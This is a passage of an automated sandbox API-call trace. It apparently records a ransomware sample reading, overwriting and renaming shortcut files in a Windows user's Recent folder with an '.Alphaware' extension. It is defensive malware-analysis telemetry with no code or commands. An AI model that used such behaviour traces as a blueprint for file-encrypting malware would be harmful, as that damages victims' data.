(lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zkwjy960tnphzx9r1d2d.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.649] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zkwjy960tnphzx9r1d2d.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13f6dc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13f6dc0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d97af60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1548)) returned 1 [0099.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.649] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zkwjy960tnphzx9r1d2d.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ZKwJY960tnphZx9R1d2d.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zkwjy960tnphzx9r1d2d.lnk.alphaware")) returned 1 [0099.651] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk", dwFileAttributes=0x80) returned 1 [0099.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.651] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zoe1ltkimcuaahrwbxf9.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2494318 | out: lpFileInformation=0x2494318*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd047dec0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd047dec0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd047dec0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9cd)) returned 1 [0099.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.651] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zoe1ltkimcuaahrwbxf9.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.651] ReadFile (in: hFile=0x250, lpBuffer=0x2495038, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2495038*, lpNumberOfBytesRead=0x23e958*=0x9cd, lpOverlapped=0x0) returned 1 [0099.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.674] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zoe1ltkimcuaahrwbxf9.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.676] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zoe1ltkimcuaahrwbxf9.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd047dec0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd047dec0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8d9c7220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xde0)) returned 1 [0099.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.677] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zoe1ltkimcuaahrwbxf9.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zOe1LTkImCuAAhrwbXf9.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zoe1ltkimcuaahrwbxf9.swf.lnk.alphaware")) returned 1 [0099.678] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk", dwFileAttributes=0x80) returned 1 [0099.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zr 1jjinh15qprebog.lnk"), fInfoLevelId=0x0, lpFileInformation=0x251a360 | out: lpFileInformation=0x251a360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd08a8540, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08a8540, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd08a8540, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1937)) returned 1 [0099.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.679] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zr 1jjinh15qprebog.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.679] ReadFile (in: hFile=0x250, lpBuffer=0x251a658, nNumberOfBytesToRead=0x1937, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x251a658*, lpNumberOfBytesRead=0x23e958*=0x1937, lpOverlapped=0x0) returned 1 [0099.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.702] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zr 1jjinh15qprebog.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.706] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zr 1jjinh15qprebog.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08a8540, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd08a8540, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8da134e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2274)) returned 1 [0099.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.706] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zr 1jjinh15qprebog.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zR 1JJINH15QPReboG.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zr 1jjinh15qprebog.lnk.alphaware")) returned 1 [0099.707] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk", dwFileAttributes=0x80) returned 1 [0099.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zu2jiwj2ww.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25aa220 | out: lpFileInformation=0x25aa220*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd040baa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16ca7e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x913)) returned 1 [0099.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.708] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zu2jiwj2ww.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.708] ReadFile (in: hFile=0x250, lpBuffer=0x25aae08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25aae08*, lpNumberOfBytesRead=0x23e958*=0x913, lpOverlapped=0x0) returned 1 [0099.733] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.734] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zu2jiwj2ww.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.735] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zu2jiwj2ww.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd040baa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8da5f7a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xcf4)) returned 1 [0099.736] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.736] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zu2jiwj2ww.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zu2JIWj2WW.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\zu2jiwj2ww.lnk.alphaware")) returned 1 [0099.738] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk", dwFileAttributes=0x80) returned 1 [0099.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_7pby2-omnucu.lnk"), fInfoLevelId=0x0, lpFileInformation=0x242f878 | out: lpFileInformation=0x242f878*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcef5db80, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2f3)) returned 1 [0099.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.739] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.739] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_7pby2-omnucu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.739] ReadFile (in: hFile=0x250, lpBuffer=0x242fe48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x242fe48*, lpNumberOfBytesRead=0x23e958*=0x2f3, lpOverlapped=0x0) returned 1 [0099.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.761] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_7pby2-omnucu.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.764] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_7pby2-omnucu.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef5db80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcef5db80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8da85900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8)) returned 1 [0099.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.764] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_7pby2-omnucu.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_7pBY2-omnUcu.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_7pby2-omnucu.lnk.alphaware")) returned 1 [0099.766] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk", dwFileAttributes=0x80) returned 1 [0099.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0099.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_aoxubo 1xfzs.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b1120 | out: lpFileInformation=0x24b1120*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd11957c0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9df)) returned 1 [0099.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0099.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0099.767] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_aoxubo 1xfzs.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0099.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0099.767] ReadFile (in: hFile=0x250, lpBuffer=0x24b1df0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b1df0*, lpNumberOfBytesRead=0x23e958*=0x9df, lpOverlapped=0x0) returned 1 [0099.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0099.790] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_aoxubo 1xfzs.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0099.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0099.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0099.793] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_aoxubo 1xfzs.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd11957c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd11957c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8dad1bc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4)) returned 1 [0099.793] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0099.793] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_aoxubo 1xfzs.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\_aOXubo 1XFZS.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\_aoxubo 1xfzs.lnk.alphaware")) returned 1 [0099.794] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0099.794] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8dad1bc0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8dad1bc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb1e820, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a8629a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Cj6mvIu4.lnk.Alphaware", cAlternateFileName="-CJ6MV~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ec1da0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ec1da0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a8faf20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="-mBHtuQ4.lnk.Alphaware", cAlternateFileName="-MBHTU~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d44fe0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d44fe0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a9471e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kv--h785b9BKHr7X8.mkv.lnk.Alphaware", cAlternateFileName="0KV--H~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0cf8d20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0cf8d20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8a9df760, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x588, dwReserved0=0x0, dwReserved1=0x0, cFileName="15FGJM2GqTiMjPf.lnk.Alphaware", cAlternateFileName="15FGJM~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0d912a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0d912a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aa51b80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="1BM5 _1HkTZyXvgJAFgc.flv.lnk.Alphaware", cAlternateFileName="1BM5_1~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15278c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15278c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aa9de40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe60, dwReserved0=0x0, dwReserved1=0x0, cFileName="1dc7CK 8O2M4jV0-v99j.lnk.Alphaware", cAlternateFileName="1DC7CK~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe3e500, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfe3e500, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aaea100, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1af4, dwReserved0=0x0, dwReserved1=0x0, 